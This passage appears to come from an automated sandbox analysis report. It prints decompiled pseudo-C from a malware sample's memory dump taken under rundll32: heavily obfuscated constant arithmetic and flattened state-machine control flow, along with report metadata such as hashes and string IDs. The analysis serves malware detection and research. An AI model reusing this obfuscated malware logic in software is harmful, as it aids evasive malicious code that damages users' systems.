                                                                                                                      				_v1116 = _v1116 * 0x46;
                                                                                                                      				_v1116 = _v1116 ^ 0x042cd8c8;
                                                                                                                      				_v1088 = 0x98b2ad;
                                                                                                                      				_v1088 = _v1088 + 0x5f8d;
                                                                                                                      				_v1088 = _v1088 << 8;
                                                                                                                      				_v1088 = _v1088 ^ 0x99161df3;
                                                                                                                      				_v1108 = 0xc44bb5;
                                                                                                                      				_v1108 = _v1108 + 0xffff808c;
                                                                                                                      				_v1108 = _v1108 ^ 0x7a0d028c;
                                                                                                                      				_v1108 = _v1108 ^ 0x7ac2537a;
                                                                                                                      				_v1128 = 0x834e58;
                                                                                                                      				_v1128 = _v1128 + 0xffff18d5;
                                                                                                                      				_v1128 = _v1128 << 0xe;
                                                                                                                      				_v1128 = _v1128 + 0xe46a;
                                                                                                                      				_v1128 = _v1128 ^ 0x99c7b134;
                                                                                                                      				_v1136 = 0xd0608e;
                                                                                                                      				_v1136 = _v1136 << 0xd;
                                                                                                                      				_v1136 = _v1136 ^ 0x0f37e4e4;
                                                                                                                      				_v1136 = _v1136 ^ 0x0bc0752d;
                                                                                                                      				_v1136 = _v1136 ^ 0x08ebd133;
                                                                                                                      				_v1120 = 0xe37477;
                                                                                                                      				_v1120 = _v1120 << 0xf;
                                                                                                                      				_v1120 = _v1120 << 0x10;
                                                                                                                      				_v1120 = _v1120 ^ 0x800d4304;
                                                                                                                      				_v1092 = 0xa7d287;
                                                                                                                      				_v1092 = _v1092 * 0x3e;
                                                                                                                      				_v1092 = _v1092 << 0xb;
                                                                                                                      				_v1092 = _v1092 ^ 0x27ebbc9f;
                                                                                                                      				_v1100 = 0xbdc4ed;
                                                                                                                      				_v1100 = _v1100 << 8;
                                                                                                                      				_t322 = 0x37;
                                                                                                                      				_v1100 = _v1100 / _t322;
                                                                                                                      				_v1100 = _v1100 ^ 0x03761b38;
                                                                                                                      				_t307 = E002D074A();
                                                                                                                      				do {
                                                                                                                      					while(_t361 != 0x31951cf) {
                                                                                                                      						if(_t361 == 0x3cad130) {
                                                                                                                      							_push( &_v1040);
                                                                                                                      							_push( &_v520);
                                                                                                                      							_push(_v1100);
                                                                                                                      							return E002B8D95(_v1120, _v1092, __eflags);
                                                                                                                      						}
                                                                                                                      						if(_t361 == 0xac73e1e) {
                                                                                                                      							_push(_v1068);
                                                                                                                      							_push(_v1168);
                                                                                                                      							_push(0x2b113c);
                                                                                                                      							_t311 = E002BAB66(_v1160, _v1096, __eflags);
                                                                                                                      							_t312 = E002B5AE2(_v1124);
                                                                                                                      							_t354 =  *0x2d520c; // 0x0
                                                                                                                      							_t266 = _t354 + 0x220; // 0x220
                                                                                                                      							_t268 = _t354 + 8; // 0x8
                                                                                                                      							E002CD37B(_t311, __eflags, _v1152, _t312, _t268, _v1116, _t268,  &_v520, _t266, _v1088);
                                                                                                                      							_t307 = E002BAE03(_v1108, _v1128, _v1136, _t311);
                                                                                                                      							_t365 =  &(_t365[0xd]);
                                                                                                                      							_t361 = 0x3cad130;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t373 = _t361 - 0xc947a3e;
                                                                                                                      						if(_t361 != 0xc947a3e) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						_push(_v1104);
                                                                                                                      						_push(_v1156);
                                                                                                                      						_push(0x2b10cc);
                                                                                                                      						_t314 = E002BAB66(_v1072, _v1080, _t373);
                                                                                                                      						_t332 =  *0x2d520c; // 0x0
                                                                                                                      						_t334 =  *0x2d520c; // 0x0
                                                                                                                      						E002BE7CE(_t314, _t373, _v1056, _t334 + 8, _t332 + 0x220, _v1064, _v1060, _v1112, _v1084, _t332 + 0x220);
                                                                                                                      						_t307 = E002BAE03(_v1148, _v1140, _v1076, _t314);
                                                                                                                      						_t365 =  &(_t365[0xd]);
                                                                                                                      						_t361 = 0xac73e1e;
                                                                                                                      					}
                                                                                                                      					_t361 = 0xc947a3e;
                                                                                                                      					L8:
                                                                                                                      					__eflags = _t361 - 0x9b97ca4;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t307;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D'j$KE.$U)$j$l}$wt
                                                                                                                      • API String ID: 0-3929749274
                                                                                                                      • Opcode ID: a5977f1ae5e7b0bb4287e001ca0eb3f61c22942d260ac4eebe5822d60686d2a2
                                                                                                                      • Instruction ID: e88298f9efc90412db0381e49ac13b744a62bf118ea9c0fe2cf76d31d5f462fc
                                                                                                                      • Opcode Fuzzy Hash: a5977f1ae5e7b0bb4287e001ca0eb3f61c22942d260ac4eebe5822d60686d2a2
                                                                                                                      • Instruction Fuzzy Hash: 5CD120714183819FC368CF65C58A94BFBF1BBC5748F508A1DF2EA96260D7B58918CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002C129C(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				void* _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				char _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				unsigned int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				void* _t225;
                                                                                                                      				signed int _t257;
                                                                                                                      				signed int* _t258;
                                                                                                                      				void* _t260;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t297;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int _t299;
                                                                                                                      				signed int _t300;
                                                                                                                      				signed int* _t305;
                                                                                                                      				void* _t308;
                                                                                                                      
                                                                                                                      				_t302 = _a8;
                                                                                                                      				_t258 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t225);
                                                                                                                      				_v20 = 0x578391;
                                                                                                                      				_t305 =  &(( &_v164)[4]);
                                                                                                                      				asm("stosd");
                                                                                                                      				_t260 = 0x3e847b6;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v136 = 0x7901e7;
                                                                                                                      				_v136 = _v136 ^ 0x0e05b978;
                                                                                                                      				_v136 = _v136 | 0x8500df2f;
                                                                                                                      				_v136 = _v136 ^ 0x8f7cffbf;
                                                                                                                      				_v72 = 0x5c6105;
                                                                                                                      				_v72 = _v72 ^ 0xba418fb0;
                                                                                                                      				_v72 = _v72 ^ 0xba16afcf;
                                                                                                                      				_v156 = 0xc57f64;
                                                                                                                      				_v156 = _v156 << 0xe;
                                                                                                                      				_v156 = _v156 | 0xac310e4c;
                                                                                                                      				_t295 = 0x48;
                                                                                                                      				_v156 = _v156 / _t295;
                                                                                                                      				_v156 = _v156 ^ 0x038a2108;
                                                                                                                      				_v100 = 0xf9dfe5;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_v100 = _v100 ^ 0x0009d912;
                                                                                                                      				_v112 = 0xb5688b;
                                                                                                                      				_t296 = 0x3d;
                                                                                                                      				_v112 = _v112 / _t296;
                                                                                                                      				_v112 = _v112 ^ 0x00064c77;
                                                                                                                      				_v116 = 0x80f1cc;
                                                                                                                      				_v116 = _v116 + 0xfffff23f;
                                                                                                                      				_v116 = _v116 ^ 0x008ab174;
                                                                                                                      				_v92 = 0xc78857;
                                                                                                                      				_v92 = _v92 | 0x5f9c477c;
                                                                                                                      				_v92 = _v92 ^ 0x5fdf5dba;
                                                                                                                      				_v148 = 0x3d8773;
                                                                                                                      				_v148 = _v148 >> 0xa;
                                                                                                                      				_v148 = _v148 | 0x15c33ced;
                                                                                                                      				_v148 = _v148 + 0xffff6977;
                                                                                                                      				_v148 = _v148 ^ 0x15c9e03a;
                                                                                                                      				_v140 = 0x8050fd;
                                                                                                                      				_v140 = _v140 + 0xffffb165;
                                                                                                                      				_v140 = _v140 ^ 0xb13fe806;
                                                                                                                      				_v140 = _v140 ^ 0xb1b5a353;
                                                                                                                      				_v104 = 0x3fa35;
                                                                                                                      				_v104 = _v104 ^ 0x0635ab8b;
                                                                                                                      				_v104 = _v104 ^ 0x0638ddfb;
                                                                                                                      				_v128 = 0x6276d2;
                                                                                                                      				_v128 = _v128 * 0x67;
                                                                                                                      				_v128 = _v128 >> 7;
                                                                                                                      				_v128 = _v128 ^ 0x004624e6;
                                                                                                                      				_v84 = 0xb2127e;
                                                                                                                      				_v84 = _v84 ^ 0xdd4df2db;
                                                                                                                      				_v84 = _v84 ^ 0xddf0f9d7;
                                                                                                                      				_v108 = 0x825106;
                                                                                                                      				_v108 = _v108 + 0x54ee;
                                                                                                                      				_v108 = _v108 ^ 0x00831379;
                                                                                                                      				_v96 = 0x675ffa;
                                                                                                                      				_v96 = _v96 + 0xffff86b7;
                                                                                                                      				_v96 = _v96 ^ 0x0064c66c;
                                                                                                                      				_v132 = 0x78c111;
                                                                                                                      				_v132 = _v132 >> 0xb;
                                                                                                                      				_v132 = _v132 + 0xffff7c58;
                                                                                                                      				_v132 = _v132 ^ 0xfff3b3ba;
                                                                                                                      				_v164 = 0xbe0848;
                                                                                                                      				_t297 = 0x46;
                                                                                                                      				_v164 = _v164 / _t297;
                                                                                                                      				_v164 = _v164 << 4;
                                                                                                                      				_v164 = _v164 >> 5;
                                                                                                                      				_v164 = _v164 ^ 0x00009249;
                                                                                                                      				_v152 = 0xd46630;
                                                                                                                      				_v152 = _v152 | 0x25786146;
                                                                                                                      				_v152 = _v152 << 6;
                                                                                                                      				_t298 = 0x4f;
                                                                                                                      				_v152 = _v152 / _t298;
                                                                                                                      				_v152 = _v152 ^ 0x0191f926;
                                                                                                                      				_v144 = 0xf6674c;
                                                                                                                      				_v144 = _v144 >> 6;
                                                                                                                      				_v144 = _v144 ^ 0xb535724d;
                                                                                                                      				_v144 = _v144 ^ 0xb53e6a0f;
                                                                                                                      				_v160 = 0x2a1e3b;
                                                                                                                      				_v160 = _v160 >> 5;
                                                                                                                      				_t299 = 0x76;
                                                                                                                      				_v160 = _v160 / _t299;
                                                                                                                      				_v160 = _v160 << 7;
                                                                                                                      				_v160 = _v160 ^ 0x00046312;
                                                                                                                      				_v120 = 0xf44552;
                                                                                                                      				_v120 = _v120 + 0xbd95;
                                                                                                                      				_v120 = _v120 ^ 0x00f02cb9;
                                                                                                                      				_v76 = 0x9a2b11;
                                                                                                                      				_v76 = _v76 << 6;
                                                                                                                      				_v76 = _v76 ^ 0x2684a730;
                                                                                                                      				_v80 = 0x6aeef9;
                                                                                                                      				_t300 = 0x51;
                                                                                                                      				_v80 = _v80 / _t300;
                                                                                                                      				_v80 = _v80 ^ 0x000c464e;
                                                                                                                      				_v124 = 0x84a5f5;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 + 0xddfe;
                                                                                                                      				_v124 = _v124 ^ 0x10975fd7;
                                                                                                                      				_v88 = 0xa441a9;
                                                                                                                      				_v88 = _v88 + 0x5567;
                                                                                                                      				_v88 = _v88 ^ 0x00aef9b7;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t308 = _t260 - 0x8801db7;
                                                                                                                      						if(_t308 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t308 == 0) {
                                                                                                                      							E002CF88F(_t302 + 0x1c,  &_v68, __eflags, _v80, _v124, _v88);
                                                                                                                      						} else {
                                                                                                                      							if(_t260 == 0x235eed) {
                                                                                                                      								E002C4D91( *((intOrPtr*)(_t302 + 0x18)),  &_v68, _v164, _v152);
                                                                                                                      								_t305 =  &(_t305[2]);
                                                                                                                      								_t260 = 0x85d9450;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t260 == 0x3e847b6) {
                                                                                                                      									_t260 = 0xab5e479;
                                                                                                                      									 *_t258 =  *_t258 & 0x00000000;
                                                                                                                      									_t258[1] = _v136;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t260 == 0x6ea21eb) {
                                                                                                                      										E002C4D91( *((intOrPtr*)(_t302 + 0x24)),  &_v68, _v84, _v108);
                                                                                                                      										_t305 =  &(_t305[2]);
                                                                                                                      										_t260 = 0x9265c01;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t260 == 0x80db57c) {
                                                                                                                      											E002C4D91( *((intOrPtr*)(_t302 + 0x30)),  &_v68, _v120, _v76);
                                                                                                                      											_t305 =  &(_t305[2]);
                                                                                                                      											_t260 = 0x8801db7;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t260 != 0x85d9450) {
                                                                                                                      												goto L24;
                                                                                                                      											} else {
                                                                                                                      												E002C4D91( *((intOrPtr*)(_t302 + 0x38)),  &_v68, _v144, _v160);
                                                                                                                      												_t305 =  &(_t305[2]);
                                                                                                                      												_t260 = 0x80db57c;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L27:
                                                                                                                      						__eflags =  *_t258;
                                                                                                                      						_t224 =  *_t258 != 0;
                                                                                                                      						__eflags = _t224;
                                                                                                                      						return 0 | _t224;
                                                                                                                      					}
                                                                                                                      					__eflags = _t260 - 0x9265c01;
                                                                                                                      					if(_t260 == 0x9265c01) {
                                                                                                                      						E002C4D91( *((intOrPtr*)(_t302 + 0x34)),  &_v68, _v96, _v132);
                                                                                                                      						_t305 =  &(_t305[2]);
                                                                                                                      						_t260 = 0x235eed;
                                                                                                                      						goto L24;
                                                                                                                      					} else {
                                                                                                                      						__eflags = _t260 - 0xa20e3fb;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E002CF88F(_t302 + 8,  &_v68, __eflags, _v140, _v104, _v128);
                                                                                                                      							_t305 =  &(_t305[3]);
                                                                                                                      							_t260 = 0x6ea21eb;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t260 - 0xab5e479;
                                                                                                                      							if(_t260 == 0xab5e479) {
                                                                                                                      								_t258[1] = E002D146E(_t302);
                                                                                                                      								_t260 = 0xffaf556;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t260 - 0xf4853c6;
                                                                                                                      								if(_t260 == 0xf4853c6) {
                                                                                                                      									E002C64C5(_v112, _v116, _v92, _v148, _t258,  &_v68);
                                                                                                                      									_t305 =  &(_t305[4]);
                                                                                                                      									_t260 = 0xa20e3fb;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t260 - 0xffaf556;
                                                                                                                      									if(_t260 != 0xffaf556) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										_push(_t260);
                                                                                                                      										_push(_t260);
                                                                                                                      										_t257 = E002C3512(_t258[1]);
                                                                                                                      										 *_t258 = _t257;
                                                                                                                      										__eflags = _t257;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t260 = 0xf4853c6;
                                                                                                                      											goto L1;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L27;
                                                                                                                      					L24:
                                                                                                                      					__eflags = _t260 - 0x1d5478a;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L27;
                                                                                                                      			}











































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fax%$gU$$F$T$^#$^#
                                                                                                                      • API String ID: 0-2311862416
                                                                                                                      • Opcode ID: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction ID: 7b0e723dd6f560f3b2b5a1b4beb8cf07a61b5ac1f3e6aa40b5016abe1746bb0d
                                                                                                                      • Opcode Fuzzy Hash: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction Fuzzy Hash: 6BC163714287419FC768CF24C88A91FBBE2FBD5758F504A1CF2864A261D3B18969CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 74%
                                                                                                                      			E002C363D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				char _v68;
                                                                                                                      				char _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				char _t264;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int _t299;
                                                                                                                      				signed int _t300;
                                                                                                                      				signed int _t301;
                                                                                                                      				signed int _t302;
                                                                                                                      				signed int _t303;
                                                                                                                      				signed int _t304;
                                                                                                                      				void* _t307;
                                                                                                                      				void* _t308;
                                                                                                                      				void* _t334;
                                                                                                                      				intOrPtr _t335;
                                                                                                                      				signed int* _t338;
                                                                                                                      
                                                                                                                      				_push(_a28);
                                                                                                                      				_t334 = __ecx;
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(0);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t264 = E002BCF25(0);
                                                                                                                      				_v72 = _t264;
                                                                                                                      				_t335 = _t264;
                                                                                                                      				_v124 = 0xc44be;
                                                                                                                      				_t338 =  &(( &_v176)[9]);
                                                                                                                      				_v124 = _v124 + 0xffff24c4;
                                                                                                                      				_t307 = 0xc36eaf9;
                                                                                                                      				_t298 = 0x37;
                                                                                                                      				_v124 = _v124 * 0x2e;
                                                                                                                      				_v124 = _v124 ^ 0x020cf15c;
                                                                                                                      				_v176 = 0xedca77;
                                                                                                                      				_v176 = _v176 * 0x1f;
                                                                                                                      				_v176 = _v176 << 4;
                                                                                                                      				_v176 = _v176 + 0xdbf9;
                                                                                                                      				_v176 = _v176 ^ 0xccb922a9;
                                                                                                                      				_v120 = 0x5a606;
                                                                                                                      				_v120 = _v120 | 0xc9e49228;
                                                                                                                      				_t299 = 0x62;
                                                                                                                      				_v120 = _v120 / _t298;
                                                                                                                      				_v120 = _v120 ^ 0x03ad0d8c;
                                                                                                                      				_v144 = 0x918442;
                                                                                                                      				_v144 = _v144 >> 0xd;
                                                                                                                      				_v144 = _v144 * 0x3e;
                                                                                                                      				_v144 = _v144 + 0xa3d5;
                                                                                                                      				_v144 = _v144 ^ 0x0007140c;
                                                                                                                      				_v88 = 0x37923f;
                                                                                                                      				_v88 = _v88 ^ 0x32449291;
                                                                                                                      				_v88 = _v88 ^ 0x3276c44e;
                                                                                                                      				_v168 = 0xa5175f;
                                                                                                                      				_v168 = _v168 + 0x6cd0;
                                                                                                                      				_v168 = _v168 >> 0xd;
                                                                                                                      				_v168 = _v168 + 0x50d;
                                                                                                                      				_v168 = _v168 ^ 0x000b28ed;
                                                                                                                      				_v96 = 0x8bb9e8;
                                                                                                                      				_v96 = _v96 ^ 0x9313002a;
                                                                                                                      				_v96 = _v96 ^ 0x93929827;
                                                                                                                      				_v128 = 0x9b97bd;
                                                                                                                      				_v128 = _v128 >> 9;
                                                                                                                      				_v128 = _v128 + 0x506c;
                                                                                                                      				_v128 = _v128 ^ 0x0008f405;
                                                                                                                      				_v136 = 0x162b;
                                                                                                                      				_v136 = _v136 << 0xe;
                                                                                                                      				_v136 = _v136 ^ 0xcbe41246;
                                                                                                                      				_v136 = _v136 ^ 0xce6e1682;
                                                                                                                      				_v160 = 0xb72d70;
                                                                                                                      				_v160 = _v160 >> 8;
                                                                                                                      				_v160 = _v160 ^ 0x815bd7a2;
                                                                                                                      				_v160 = _v160 ^ 0x177336f3;
                                                                                                                      				_v160 = _v160 ^ 0x962c98d3;
                                                                                                                      				_v100 = 0xe545e5;
                                                                                                                      				_v100 = _v100 + 0xffffaae8;
                                                                                                                      				_v100 = _v100 | 0x514a639c;
                                                                                                                      				_v100 = _v100 ^ 0x51eea269;
                                                                                                                      				_v152 = 0xd9d32c;
                                                                                                                      				_v152 = _v152 >> 8;
                                                                                                                      				_v152 = _v152 ^ 0x78b07b8d;
                                                                                                                      				_v152 = _v152 / _t299;
                                                                                                                      				_v152 = _v152 ^ 0x01343475;
                                                                                                                      				_v92 = 0x6219a9;
                                                                                                                      				_v92 = _v92 << 8;
                                                                                                                      				_v92 = _v92 ^ 0x6210c938;
                                                                                                                      				_v80 = 0x3ff2a1;
                                                                                                                      				_v80 = _v80 + 0xffff7ea3;
                                                                                                                      				_v80 = _v80 ^ 0x003f2f73;
                                                                                                                      				_v164 = 0xe5565b;
                                                                                                                      				_v164 = _v164 + 0xffff5b62;
                                                                                                                      				_t300 = 0x78;
                                                                                                                      				_v164 = _v164 * 6;
                                                                                                                      				_v164 = _v164 / _t300;
                                                                                                                      				_v164 = _v164 ^ 0x000727eb;
                                                                                                                      				_v76 = 0x250d2;
                                                                                                                      				_v76 = _v76 | 0x8f851c12;
                                                                                                                      				_v76 = _v76 ^ 0x8f8220e2;
                                                                                                                      				_v116 = 0x568e;
                                                                                                                      				_v116 = _v116 ^ 0x3d61f204;
                                                                                                                      				_v116 = _v116 << 7;
                                                                                                                      				_v116 = _v116 ^ 0xb0d54eba;
                                                                                                                      				_v172 = 0xa5a4a3;
                                                                                                                      				_v172 = _v172 | 0xd2f7b266;
                                                                                                                      				_v172 = _v172 >> 0xd;
                                                                                                                      				_t301 = 0x7f;
                                                                                                                      				_v172 = _v172 * 0x30;
                                                                                                                      				_v172 = _v172 ^ 0x0132b547;
                                                                                                                      				_v112 = 0xd0329d;
                                                                                                                      				_v112 = _v112 * 0x58;
                                                                                                                      				_v112 = _v112 << 3;
                                                                                                                      				_v112 = _v112 ^ 0x3c81866c;
                                                                                                                      				_v104 = 0x844e69;
                                                                                                                      				_v104 = _v104 << 0xc;
                                                                                                                      				_v104 = _v104 >> 4;
                                                                                                                      				_v104 = _v104 ^ 0x0443b556;
                                                                                                                      				_v84 = 0x1d6374;
                                                                                                                      				_v84 = _v84 >> 0xd;
                                                                                                                      				_v84 = _v84 ^ 0x000df0de;
                                                                                                                      				_v148 = 0x6585fd;
                                                                                                                      				_v148 = _v148 / _t301;
                                                                                                                      				_t302 = 0x77;
                                                                                                                      				_v148 = _v148 / _t302;
                                                                                                                      				_v148 = _v148 >> 0xa;
                                                                                                                      				_v148 = _v148 ^ 0x000a9d1a;
                                                                                                                      				_v156 = 0xff5a31;
                                                                                                                      				_v156 = _v156 + 0xce45;
                                                                                                                      				_t303 = 0x29;
                                                                                                                      				_v156 = _v156 / _t303;
                                                                                                                      				_v156 = _v156 << 1;
                                                                                                                      				_v156 = _v156 ^ 0x0008392b;
                                                                                                                      				_v132 = 0x13d5b5;
                                                                                                                      				_v132 = _v132 << 0x10;
                                                                                                                      				_v132 = _v132 + 0xffff95f7;
                                                                                                                      				_v132 = _v132 ^ 0xd5b1b27f;
                                                                                                                      				_v108 = 0x3556bb;
                                                                                                                      				_v108 = _v108 * 0x4f;
                                                                                                                      				_v108 = _v108 + 0xffff90f3;
                                                                                                                      				_v108 = _v108 ^ 0x10791788;
                                                                                                                      				_v140 = 0x81de0d;
                                                                                                                      				_t304 = 0x6d;
                                                                                                                      				_v140 = _v140 / _t304;
                                                                                                                      				_v140 = _v140 + 0xf4b;
                                                                                                                      				_v140 = _v140 * 0x26;
                                                                                                                      				_v140 = _v140 ^ 0x002a9917;
                                                                                                                      				do {
                                                                                                                      					while(_t307 != 0x688d2d5) {
                                                                                                                      						if(_t307 == 0x8a4f536) {
                                                                                                                      							_t295 = E002C5B0E(_a28, _v120,  &_v72, _v144);
                                                                                                                      							_t338 =  &(_t338[3]);
                                                                                                                      							__eflags = _t295;
                                                                                                                      							if(_t295 != 0) {
                                                                                                                      								_t307 = 0x688d2d5;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t307 == 0x94a3104) {
                                                                                                                      								E002B6E34(_v132, _v72, _v108, _v140);
                                                                                                                      							} else {
                                                                                                                      								if(_t307 != 0xc36eaf9) {
                                                                                                                      									goto L9;
                                                                                                                      								} else {
                                                                                                                      									_t307 = 0x8a4f536;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L12:
                                                                                                                      						return _t335;
                                                                                                                      					}
                                                                                                                      					_push(_v128);
                                                                                                                      					_push(_v96);
                                                                                                                      					_push(_v168);
                                                                                                                      					_push(_v88);
                                                                                                                      					_t308 = 0x44;
                                                                                                                      					E002D1310(_t308,  &_v68);
                                                                                                                      					_push(_v152);
                                                                                                                      					_v68 = 0x44;
                                                                                                                      					_push(_v100);
                                                                                                                      					_t309 = _v136;
                                                                                                                      					_push(0x2b1800);
                                                                                                                      					_v60 = E002BAB66(_v136, _v160, __eflags);
                                                                                                                      					__eflags = _v176 | _v124;
                                                                                                                      					_t335 = E002CC8BD(_v92, _v136, _v80, _v136, _t309, _v164, _v76, _a20, _v116, _t334, _a28, _v172, _v176 | _v124, 0, _v112,  &_v68, _v72, _v104);
                                                                                                                      					E002BAE03(_v84, _v148, _v156, _v60);
                                                                                                                      					_t338 =  &(_t338[0x1a]);
                                                                                                                      					_t307 = 0x94a3104;
                                                                                                                      					L9:
                                                                                                                      					__eflags = _t307 - 0xce6287b;
                                                                                                                      				} while (_t307 != 0xce6287b);
                                                                                                                      				goto L12;
                                                                                                                      			}















































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *$D$[V$lP$s/?$E
                                                                                                                      • API String ID: 0-4039435091
                                                                                                                      • Opcode ID: df1b61ba840b9f203b8027a3a0a85c57521a2966b6fe6dd2b0946220639c4ced
                                                                                                                      • Instruction ID: 836c812cfb9d6c85692b5048689dcdbd6b28eb2e02899b10f52c25a38ea6f5e3
                                                                                                                      • Opcode Fuzzy Hash: df1b61ba840b9f203b8027a3a0a85c57521a2966b6fe6dd2b0946220639c4ced
                                                                                                                      • Instruction Fuzzy Hash: 97C13F715083809FD364CF64C98AA1BFBE1FBD8748F609A1DF69586260C7B58958CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002B88F4(void* __ecx) {
